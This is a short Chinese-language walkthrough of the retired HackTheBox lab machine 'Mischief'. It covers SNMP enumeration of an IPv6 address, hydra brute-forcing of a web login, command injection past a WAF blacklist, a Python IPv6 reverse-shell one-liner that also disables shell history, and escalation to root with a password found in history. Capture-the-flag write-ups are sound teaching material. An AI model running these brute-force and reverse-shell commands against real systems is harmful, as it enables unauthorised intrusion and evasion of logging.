HTB-靶机-Mischief

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关

靶机是作者购买VIP使用退役靶机操作，显示IP地址为10.10.10.92

本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

执行命令 autorecon 10.10.10.92 -o ./Mischief-autorecon

根据上述的扫描结果，得出目标开放了重要端口161，通过此端口读取IPv6地址信息，并根据获取的账户密码登录目标靶机web应用

上述两种形式得到IPv6地址，不过他们之际只能使用其中一种形式，原因在于是否把配置文件/etc/snmp/snmp.conf 里面的mibs注释与否

将得到的IPv6地址追加到的hosts文件里面

echo "dead:beef:0000:0000:0250:56ff:feb9:f449 mischief.htb" |sudo tee -a /etc/hosts

使用hydra进行爆破用户名

hydra -I -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -p trickeryanddeceit mischief.htb http-post-form "/login.php:user=^USER^&password=^PASS^:credentials do not match"

使用上面得到的用户名和密码访问IPv6地址的web应用，并登录

通过测试可以在上面基础上加单引号；前后都加即可执行命令，但是目标还是存在WAF黑名单，有一定的防护作用，不过还可以反弹shell，具体操作如下

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::1004",8833));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv("HISTFILE","/dev/null");pty.spawn("/bin/sh");s.close()'

上述是反弹代码，通过burpsuite进行操作

上述反弹shell之前也是可以直接根据页面的提示读取密码信息直接登录目标靶机

登录成功直接读取了user.txt

读取历史记录信息

发现了密码 lokipasswordmischieftrickery 通过用户loki进行su切换，发现没有权限，那么使用反弹shell的权限使用su切换至root用户